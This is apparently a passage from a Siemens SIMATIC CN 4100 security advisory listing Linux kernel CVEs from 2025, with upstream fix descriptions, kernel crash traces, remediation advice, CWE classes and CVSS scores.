do_user_addr_fault+0x7fe/0x12f0 [ 667.125143][ T9805] do_syscall_64+0xc9/0x480 [ 667.125151][ T9805] entry_SYSCALL_64_after_hwframe+0x77/0x7f [ 667.125158][ T9805] RIP: 0033:0x7fa8753b2fc9 [ 667.125164][ T9805] Code: 00 c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 48 [ 667.125172][ T9805] RSP: 002b:00007ffe96f8e0f8 EFLAGS: 00000217 ORIG_RAX: 00000000000000d9 [ 667.125181][ T9805] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007fa8753b2fc9 [ 667.125185][ T9805] RDX: 0000000000000400 RSI: 00002000000063c0 RDI: 0000000000000004 [ 667.125190][ T9805] RBP: 00007ffe96f8e110 R08: 00007ffe96f8e110 R09: 00007ffe96f8e110 [ 667.125195][ T9805] R10: 0000000000000000 R11: 0000000000000217 R12: 0000556b1e3b4260 [ 667.125199][ T9805] R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000 [ 667.125207][ T9805] [ 667.125210][ T9805] [ 667.145632][ T9805] Allocated by task 9805: [ 667.145991][ T9805] kasan_save_stack+0x20/0x40 [ 667.146352][ T9805] kasan_save_track+0x14/0x30 [ 667.146717][ T9805] __kasan_kmalloc+0xaa/0xb0 [ 667.147065][ T9805] __kmalloc_noprof+0x205/0x550 [ 667.147448][ T9805] hfsplus_find_init+0x95/0x1f0 [ 667.147813][ T9805] hfsplus_readdir+0x220/0xfc0 [ 667.148174][ T9805] iterate_dir+0x296/0xb20 [ 667.148549][ T9805] __x64_sys_getdents64+0x13c/0x2c0 [ 667.148937][ T9805] do_syscall_64+0xc9/0x480 [ 667.149291][ T9805] entry_SYSCALL_64_after_hwframe+0x77/0x7f [ 667.149809][ T9805] [ 667.150030][ T9805] The buggy address belongs to the object at ffff88802592f000 [ 667.150030][ T9805] which belongs to the cache kmalloc-2k of size 2048 [ 667.151282][ T9805] The buggy address is located 0 bytes to the right of [ 667.151282][ T9805] allocated 1036-byte region [ffff88802592f000, ffff88802592f40c) [ 667.1 ---truncated--- View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 7 HIGH CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2025-38714 In the Linux kernel, the following vulnerability has been resolved: hfsplus: fix slab-out-of-bounds in hfsplus_bnode_read() The hfsplus_bnode_read() method can trigger the issue: [ 174.852007][ T9784] ================================================================== [ 174.852709][ T9784] BUG: KASAN: slab-out-of-bounds in hfsplus_bnode_read+0x2f4/0x360 [ 174.853412][ T9784] Read of size 8 at addr ffff88810b5fc6c0 by task repro/9784 [ 174.854059][ T9784] [ 174.854272][ T9784] CPU: 1 UID: 0 PID: 9784 Comm: repro Not tainted 6.16.0-rc3 #7 PREEMPT(full) [ 174.854281][ T9784] Hardware name: QEMU Ubuntu 24.04 PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014 [ 174.854286][ T9784] Call Trace: [ 174.854289][ T9784] [ 174.854292][ T9784] dump_stack_lvl+0x10e/0x1f0 [ 174.854305][ T9784] print_report+0xd0/0x660 [ 174.854315][ T9784] ? __virt_addr_valid+0x81/0x610 [ 174.854323][ T9784] ? __phys_addr+0xe8/0x180 [ 174.854330][ T9784] ? hfsplus_bnode_read+0x2f4/0x360 [ 174.854337][ T9784] kasan_report+0xc6/0x100 [ 174.854346][ T9784] ? hfsplus_bnode_read+0x2f4/0x360 [ 174.854354][ T9784] hfsplus_bnode_read+0x2f4/0x360 [ 174.854362][ T9784] hfsplus_bnode_dump+0x2ec/0x380 [ 174.854370][ T9784] ? __pfx_hfsplus_bnode_dump+0x10/0x10 [ 174.854377][ T9784] ? hfsplus_bnode_write_u16+0x83/0xb0 [ 174.854385][ T9784] ? srcu_gp_start+0xd0/0x310 [ 174.854393][ T9784] ? __mark_inode_dirty+0x29e/0xe40 [ 174.854402][ T9784] hfsplus_brec_remove+0x3d2/0x4e0 [ 174.854411][ T9784] __hfsplus_delete_attr+0x290/0x3a0 [ 174.854419][ T9784] ? __pfx_hfs_find_1st_rec_by_cnid+0x10/0x10 [ 174.854427][ T9784] ? __pfx___hfsplus_delete_attr+0x10/0x10 [ 174.854436][ T9784] ? __asan_memset+0x23/0x50 [ 174.854450][ T9784] hfsplus_delete_all_attrs+0x262/0x320 [ 174.854459][ T9784] ? __pfx_hfsplus_delete_all_attrs+0x10/0x10 [ 174.854469][ T9784] ? rcu_is_watching+0x12/0xc0 [ 174.854476][ T9784] ? __mark_inode_dirty+0x29e/0xe40 [ 174.854483][ T9784] hfsplus_delete_cat+0x845/0xde0 [ 174.854493][ T9784] ? __pfx_hfsplus_delete_cat+0x10/0x10 [ 174.854507][ T9784] hfsplus_unlink+0x1ca/0x7c0 [ 174.854516][ T9784] ? __pfx_hfsplus_unlink+0x10/0x10 [ 174.854525][ T9784] ? down_write+0x148/0x200 [ 174.854532][ T9784] ? __pfx_down_write+0x10/0x10 [ 174.854540][ T9784] vfs_unlink+0x2fe/0x9b0 [ 174.854549][ T9784] do_unlinkat+0x490/0x670 [ 174.854557][ T9784] ? __pfx_do_unlinkat+0x10/0x10 [ 174.854565][ T9784] ? __might_fault+0xbc/0x130 [ 174.854576][ T9784] ? getname_flags.part.0+0x1c5/0x550 [ 174.854584][ T9784] __x64_sys_unlink+0xc5/0x110 [ 174.854592][ T9784] do_syscall_64+0xc9/0x480 [ 174.854600][ T9784] entry_SYSCALL_64_after_hwframe+0x77/0x7f [ 174.854608][ T9784] RIP: 0033:0x7f6fdf4c3167 [ 174.854614][ T9784] Code: f0 ff ff 73 01 c3 48 8b 0d 26 0d 0e 00 f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 08 [ 174.854622][ T9784] RSP: 002b:00007ffcb948bca8 EFLAGS: 00000206 ORIG_RAX: 0000000000000057 [ 174.854630][ T9784] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f6fdf4c3167 [ 174.854636][ T9784] RDX: 00007ffcb948bcc0 RSI: 00007ffcb948bcc0 RDI: 00007ffcb948bd50 [ 174.854641][ T9784] RBP: 00007ffcb948cd90 R08: 0000000000000001 R09: 00007ffcb948bb40 [ 174.854645][ T9784] R10: 00007f6fdf564fc0 R11: 0000000000000206 R12: 0000561e1bc9c2d0 [ 174.854650][ T9784] R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000 [ 174.854658][ T9784] [ 174.854661][ T9784] [ 174.879281][ T9784] Allocated by task 9784: [ 174.879664][ T9784] kasan_save_stack+0x20/0x40 [ 174.880082][ T9784] kasan_save_track+0x14/0x30 [ 174.880500][ T9784] __kasan_kmalloc+0xaa/0xb0 [ 174.880908][ T9784] __kmalloc_noprof+0x205/0x550 [ 174.881337][ T9784] __hfs_bnode_create+0x107/0x890 [ 174.881779][ T9784] hfsplus_bnode_find+0x2d0/0xd10 [ 174.882222][ T9784] hfsplus_brec_find+0x2b0/0x520 [ 174.882659][ T9784] hfsplus_delete_all_attrs+0x23b/0x3 ---truncated--- View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 7 HIGH CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2025-38715 In the Linux kernel, the following vulnerability has been resolved: hfs: fix slab-out-of-bounds in hfs_bnode_read() This patch introduces is_bnode_offset_valid() method that checks the requested offset value. Also, it introduces check_and_correct_requested_length() method that checks and correct the requested length (if it is necessary). These methods are used in hfs_bnode_read(), hfs_bnode_write(), hfs_bnode_clear(), hfs_bnode_copy(), and hfs_bnode_move() with the goal to prevent the access out of allocated memory and triggering the crash. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-38721 In the Linux kernel, the following vulnerability has been resolved: netfilter: ctnetlink: fix refcount leak on table dump There is a reference count leak in ctnetlink_dump_table(): if (res < 0) { nf_conntrack_get(&ct->ct_general); // HERE cb->args[1] = (unsigned long)ct; ... While its very unlikely, its possible that ct == last. If this happens, then the refcount of ct was already incremented. This 2nd increment is never undone. This prevents the conntrack object from being released, which in turn keeps prevents cnet->count from dropping back to 0. This will then block the netns dismantle (or conntrack rmmod) as nf_conntrack_cleanup_net_list() will wait forever. This can be reproduced by running conntrack_resize.sh selftest in a loop. It takes ~20 minutes for me on a preemptible kernel on average before I see a runaway kworker spinning in nf_conntrack_cleanup_net_list. One fix would to change this to: if (res < 0) { if (ct != last) nf_conntrack_get(&ct->ct_general); But this reference counting isn't needed in the first place. We can just store a cookie value instead. A followup patch will do the same for ctnetlink_exp_dump_table, it looks to me as if this has the same problem and like ctnetlink_dump_table, we only need a 'skip hint', not the actual object so we can apply the same cookie strategy there as well. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-772 Missing Release of Resource after Effective Lifetime Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-38723 In the Linux kernel, the following vulnerability has been resolved: LoongArch: BPF: Fix jump offset calculation in tailcall The extra pass of bpf_int_jit_compile() skips JIT context initialization which essentially skips offset calculation leaving out_offset = -1, so the jmp_offset in emit_bpf_tail_call is calculated by "#define jmp_offset (out_offset - (cur_offset))" is a negative number, which is wrong. The final generated assembly are as follow. 54: bgeu $a2, $t1, -8 # 0x0000004c 58: addi.d $a6, $s5, -1 5c: bltz $a6, -16 # 0x0000004c 60: alsl.d $t2, $a2, $a1, 0x3 64: ld.d $t2, $t2, 264 68: beq $t2, $zero, -28 # 0x0000004c Before apply this patch, the follow test case will reveal soft lock issues. cd tools/testing/selftests/bpf/ ./test_progs --allow=tailcalls/tailcall_bpf2bpf_1 dmesg: watchdog: BUG: soft lockup - CPU#2 stuck for 26s! [test_progs:25056] View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-38724 In the Linux kernel, the following vulnerability has been resolved: nfsd: handle get_client_locked() failure in nfsd4_setclientid_confirm() Lei Lu recently reported that nfsd4_setclientid_confirm() did not check the return value from get_client_locked(). a SETCLIENTID_CONFIRM could race with a confirmed client expiring and fail to get a reference. That could later lead to a UAF. Fix this by getting a reference early in the case where there is an extant confirmed client. If that fails then treat it as if there were no confirmed client found at all. In the case where the unconfirmed client is expiring, just fail and return the result from get_client_locked(). View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-416 Use After Free Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2025-38725 In the Linux kernel, the following vulnerability has been resolved: net: usb: asix_devices: add phy_mask for ax88772 mdio bus Without setting phy_mask for ax88772 mdio bus, current driver may create at most 32 mdio phy devices with phy address range from 0x00 ~ 0x1f. DLink DUB-E100 H/W Ver B1 is such a device. However, only one main phy device will bind to net phy driver. This is creating issue during system suspend/resume since phy_polling_mode() in phy_state_machine() will directly deference member of phydev->drv for non-main phy devices. Then NULL pointer dereference issue will occur. Due to only external phy or internal phy is necessary, add phy_mask for ax88772 mdio bus to workarnoud the issue. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 7 HIGH CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2025-38727 In the Linux kernel, the following vulnerability has been resolved: netlink: avoid infinite retry looping in netlink_unicast() netlink_attachskb() checks for the socket's read memory allocation constraints. Firstly, it has: rmem < READ_ONCE(sk->sk_rcvbuf) to check if the just increased rmem value fits into the socket's receive buffer. If not, it proceeds and tries to wait for the memory under: rmem + skb->truesize > READ_ONCE(sk->sk_rcvbuf) The checks don't cover the case when skb->truesize + sk->sk_rmem_alloc is equal to sk->sk_rcvbuf. Thus the function neither successfully accepts these conditions, nor manages to reschedule the task - and is called in retry loop for indefinite time which is caught as: rcu: INFO: rcu_sched self-detected stall on CPU rcu: 0-....: (25999 ticks this GP) idle=ef2/1/0x4000000000000000 softirq=262269/262269 fqs=6212 (t=26000 jiffies g=230833 q=259957) NMI backtrace for cpu 0 CPU: 0 PID: 22 Comm: kauditd Not tainted 5.10.240 #68 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.17.0-4.fc42 04/01/2014 Call Trace: dump_stack lib/dump_stack.c:120 nmi_cpu_backtrace.cold lib/nmi_backtrace.c:105 nmi_trigger_cpumask_backtrace lib/nmi_backtrace.c:62 rcu_dump_cpu_stacks kernel/rcu/tree_stall.h:335 rcu_sched_clock_irq.cold kernel/rcu/tree.c:2590 update_process_times kernel/time/timer.c:1953 tick_sched_handle kernel/time/tick-sched.c:227 tick_sched_timer kernel/time/tick-sched.c:1399 __hrtimer_run_queues kernel/time/hrtimer.c:1652 hrtimer_interrupt kernel/time/hrtimer.c:1717 __sysvec_apic_timer_interrupt arch/x86/kernel/apic/apic.c:1113 asm_call_irq_on_stack arch/x86/entry/entry_64.S:808 netlink_attachskb net/netlink/af_netlink.c:1234 netlink_unicast net/netlink/af_netlink.c:1349 kauditd_send_queue kernel/audit.c:776 kauditd_thread kernel/audit.c:897 kthread kernel/kthread.c:328 ret_from_fork arch/x86/entry/entry_64.S:304 Restore the original behavior of the check which commit in Fixes accidentally missed when restructuring the code. Found by Linux Verification Center (linuxtesting.org). View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-835 Loop with Unreachable Exit Condition ('Infinite Loop') Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-38728 In the Linux kernel, the following vulnerability has been resolved: smb3: fix for slab out of bounds on mount to ksmbd With KASAN enabled, it is possible to get a slab out of bounds during mount to ksmbd due to missing check in parse_server_interfaces() (see below): BUG: KASAN: slab-out-of-bounds in parse_server_interfaces+0x14ee/0x1880 [cifs] Read of size 4 at addr ffff8881433dba98 by task mount/9827 CPU: 5 UID: 0 PID: 9827 Comm: mount Tainted: G OE 6.16.0-rc2-kasan #2 PREEMPT(voluntary) Tainted: [O]=OOT_MODULE, [E]=UNSIGNED_MODULE Hardware name: Dell Inc. Precision Tower 3620/0MWYPT, BIOS 2.13.1 06/14/2019 Call Trace: dump_stack_lvl+0x9f/0xf0 print_report+0xd1/0x670 __virt_addr_valid+0x22c/0x430 ? parse_server_interfaces+0x14ee/0x1880 [cifs] ? kasan_complete_mode_report_info+0x2a/0x1f0 ? parse_server_interfaces+0x14ee/0x1880 [cifs] kasan_report+0xd6/0x110 parse_server_interfaces+0x14ee/0x1880 [cifs] __asan_report_load_n_noabort+0x13/0x20 parse_server_interfaces+0x14ee/0x1880 [cifs] ? __pfx_parse_server_interfaces+0x10/0x10 [cifs] ? trace_hardirqs_on+0x51/0x60 SMB3_request_interfaces+0x1ad/0x3f0 [cifs] ? __pfx_SMB3_request_interfaces+0x10/0x10 [cifs] ? SMB2_tcon+0x23c/0x15d0 [cifs] smb3_qfs_tcon+0x173/0x2b0 [cifs] ? __pfx_smb3_qfs_tcon+0x10/0x10 [cifs] ? cifs_get_tcon+0x105d/0x2120 [cifs] ? do_raw_spin_unlock+0x5d/0x200 ? cifs_get_tcon+0x105d/0x2120 [cifs] ? __pfx_smb3_qfs_tcon+0x10/0x10 [cifs] cifs_mount_get_tcon+0x369/0xb90 [cifs] ? dfs_cache_find+0xe7/0x150 [cifs] dfs_mount_share+0x985/0x2970 [cifs] ? check_path.constprop.0+0x28/0x50 ? save_trace+0x54/0x370 ? __pfx_dfs_mount_share+0x10/0x10 [cifs] ? __lock_acquire+0xb82/0x2ba0 ? __kasan_check_write+0x18/0x20 cifs_mount+0xbc/0x9e0 [cifs] ? __pfx_cifs_mount+0x10/0x10 [cifs] ? do_raw_spin_unlock+0x5d/0x200 ? cifs_setup_cifs_sb+0x29d/0x810 [cifs] cifs_smb3_do_mount+0x263/0x1990 [cifs] View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-125 Out-of-bounds Read Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-38729 In the Linux kernel, the following vulnerability has been resolved: ALSA: usb-audio: Validate UAC3 power domain descriptors, too UAC3 power domain descriptors need to be verified with its variable bLength for avoiding the unexpected OOB accesses by malicious firmware, too. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-125 Out-of-bounds Read Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.1 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H CVE-2025-38732 In the Linux kernel, the following vulnerability has been resolved: netfilter: nf_reject: don't leak dst refcount for loopback packets recent patches to add a WARN() when replacing skb dst entry found an old bug: WARNING: include/linux/skbuff.h:1165 skb_dst_check_unset include/linux/skbuff.h:1164 [inline] WARNING: include/linux/skbuff.h:1165 skb_dst_set include/linux/skbuff.h:1210 [inline] WARNING: include/linux/skbuff.h:1165 nf_reject_fill_skb_dst+0x2a4/0x330 net/ipv4/netfilter/nf_reject_ipv4.c:234 [..] Call Trace: nf_send_unreach+0x17b/0x6e0 net/ipv4/netfilter/nf_reject_ipv4.c:325 nft_reject_inet_eval+0x4bc/0x690 net/netfilter/nft_reject_inet.c:27 expr_call_ops_eval net/netfilter/nf_tables_core.c:237 [inline] .. This is because blamed commit forgot about loopback packets. Such packets already have a dst_entry attached, even at PRE_ROUTING stage. Instead of checking hook just check if the skb already has a route attached to it. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-911 Improper Update of Reference Count Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.8 MEDIUM CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H CVE-2025-38735 In the Linux kernel, the following vulnerability has been resolved: gve: prevent ethtool ops after shutdown A crash can occur if an ethtool operation is invoked after shutdown() is called. shutdown() is invoked during system shutdown to stop DMA operations without performing expensive deallocations. It is discouraged to unregister the netdev in this path, so the device may still be visible to userspace and kernel helpers. In gve, shutdown() tears down most internal data structures. If an ethtool operation is dispatched after shutdown(), it will dereference freed or NULL pointers, leading to a kernel panic. While graceful shutdown normally quiesces userspace before invoking the reboot syscall, forced shutdowns (as observed on GCP VMs) can still trigger this path. Fix by calling netif_device_detach() in shutdown(). This marks the device as detached so the ethtool ioctl handler will skip dispatching operations to the driver. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-664 Improper Control of a Resource Through its Lifetime Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-38736 In the Linux kernel, the following vulnerability has been resolved: net: usb: asix_devices: Fix PHY address mask in MDIO bus initialization Syzbot reported shift-out-of-bounds exception on MDIO bus initialization. The PHY address should be masked to 5 bits (0-31). Without this mask, invalid PHY addresses could be used, potentially causing issues with MDIO bus operations. Fix this by masking the PHY address with 0x1f (31 decimal) to ensure it stays within the valid range. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39673 In the Linux kernel, the following vulnerability has been resolved: ppp: fix race conditions in ppp_fill_forward_path ppp_fill_forward_path() has two race conditions: 1. The ppp->channels list can change between list_empty() and list_first_entry(), as ppp_lock() is not held. If the only channel is deleted in ppp_disconnect_channel(), list_first_entry() may access an empty head or a freed entry, and trigger a panic. 2. pch->chan can be NULL. When ppp_unregister_channel() is called, pch->chan is set to NULL before pch is removed from ppp->channels. Fix these by using a lockless RCU approach: - Use list_first_or_null_rcu() to safely test and access the first list entry. - Convert list modifications on ppp->channels to their RCU variants and add synchronize_net() after removal. - Check for a NULL pch->chan before dereferencing it. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-362 Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition') Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.9 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H CVE-2025-39675 In the Linux kernel, the following vulnerability has been resolved: drm/amd/display: Add null pointer check in mod_hdcp_hdcp1_create_session() The function mod_hdcp_hdcp1_create_session() calls the function get_first_active_display(), but does not check its return value. The return value is a null pointer if the display list is empty. This will lead to a null pointer dereference. Add a null pointer check for get_first_active_display() and return MOD_HDCP_STATUS_DISPLAY_NOT_FOUND if the function return null. This is similar to the commit c3e9826a2202 ("drm/amd/display: Add null pointer check for get_first_active_display()"). (cherry picked from commit 5e43eb3cd731649c4f8b9134f857be62a416c893) View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39676 In the Linux kernel, the following vulnerability has been resolved: scsi: qla4xxx: Prevent a potential error pointer dereference The qla4xxx_get_ep_fwdb() function is supposed to return NULL on error, but qla4xxx_ep_connect() returns error pointers. Propagating the error pointers will lead to an Oops in the caller, so change the error pointers to NULL. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-394 Unexpected Status Code or Return Value Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.1 MEDIUM CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H CVE-2025-39681 In the Linux kernel, the following vulnerability has been resolved: x86/cpu/hygon: Add missing resctrl_cpu_detect() in bsp_init helper Since 923f3a2b48bd ("x86/resctrl: Query LLC monitoring properties once during boot") resctrl_cpu_detect() has been moved from common CPU initialization code to the vendor-specific BSP init helper, while Hygon didn't put that call in their code. This triggers a division by zero fault during early booting stage on our machines with X86_FEATURE_CQM* supported, where get_rdt_mon_resources() tries to calculate mon_l3_config with uninitialized boot_cpu_data.x86_cache_occ_scale. Add the missing resctrl_cpu_detect() in the Hygon BSP init helper. [ bp: Massage commit message. ] View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-369 Divide By Zero Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39682 In the Linux kernel, the following vulnerability has been resolved: tls: fix handling of zero-length records on the rx_list Each recvmsg() call must process either - only contiguous DATA records (any number of them) - one non-DATA record If the next record has different type than what has already been processed we break out of the main processing loop. If the record has already been decrypted (which may be the case for TLS 1.3 where we don't know type until decryption) we queue the pending record to the rx_list. Next recvmsg() will pick it up from there. Queuing the skb to rx_list after zero-copy decrypt is not possible, since in that case we decrypted directly to the user space buffer, and we don't have an skb to queue (darg.skb points to the ciphertext skb for access to metadata like length). Only data records are allowed zero-copy, and we break the processing loop after each non-data record. So we should never zero-copy and then find out that the record type has changed. The corner case we missed is when the initial record comes from rx_list, and it's zero length. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 7 HIGH CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:H CVE-2025-39683 In the Linux kernel, the following vulnerability has been resolved: tracing: Limit access to parser->buffer when trace_get_user failed When the length of the string written to set_ftrace_filter exceeds FTRACE_BUFF_MAX, the following KASAN alarm will be triggered: BUG: KASAN: slab-out-of-bounds in strsep+0x18c/0x1b0 Read of size 1 at addr ffff0000d00bd5ba by task ash/165 CPU: 1 UID: 0 PID: 165 Comm: ash Not tainted 6.16.0-g6bcdbd62bd56-dirty Hardware name: linux,dummy-virt (DT) Call trace: show_stack+0x34/0x50 (C) dump_stack_lvl+0xa0/0x158 print_address_description.constprop.0+0x88/0x398 print_report+0xb0/0x280 kasan_report+0xa4/0xf0 __asan_report_load1_noabort+0x20/0x30 strsep+0x18c/0x1b0 ftrace_process_regex.isra.0+0x100/0x2d8 ftrace_regex_release+0x484/0x618 __fput+0x364/0xa58 ____fput+0x28/0x40 task_work_run+0x154/0x278 do_notify_resume+0x1f0/0x220 el0_svc+0xec/0xf0 el0t_64_sync_handler+0xa0/0xe8 el0t_64_sync+0x1ac/0x1b0 The reason is that trace_get_user will fail when processing a string longer than FTRACE_BUFF_MAX, but not set the end of parser->buffer to 0. Then an OOB access will be triggered in ftrace_regex_release-> ftrace_process_regex->strsep->strpbrk. We can solve this problem by limiting access to parser->buffer when trace_get_user failed. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-125 Out-of-bounds Read Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.1 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H CVE-2025-39684 In the Linux kernel, the following vulnerability has been resolved: comedi: Fix use of uninitialized memory in do_insn_ioctl() and do_insnlist_ioctl() syzbot reports a KMSAN kernel-infoleak in `do_insn_ioctl()`. A kernel buffer is allocated to hold `insn->n` samples (each of which is an `unsigned int`). For some instruction types, `insn->n` samples are copied back to user-space, unless an error code is being returned. The problem is that not all the instruction handlers that need to return data to userspace fill in the whole `insn->n` samples, so that there is an information leak. There is a similar syzbot report for `do_insnlist_ioctl()`, although it does not have a reproducer for it at the time of writing. One culprit is `insn_rw_emulate_bits()` which is used as the handler for `INSN_READ` or `INSN_WRITE` instructions for subdevices that do not have a specific handler for that instruction, but do have an `INSN_BITS` handler. For `INSN_READ` it only fills in at most 1 sample, so if `insn->n` is greater than 1, the remaining `insn->n - 1` samples copied to userspace will be uninitialized kernel data. Another culprit is `vm80xx_ai_insn_read()` in the "vm80xx" driver. It never returns an error, even if it fails to fill the buffer. Fix it in `do_insn_ioctl()` and `do_insnlist_ioctl()` by making sure that uninitialized parts of the allocated buffer are 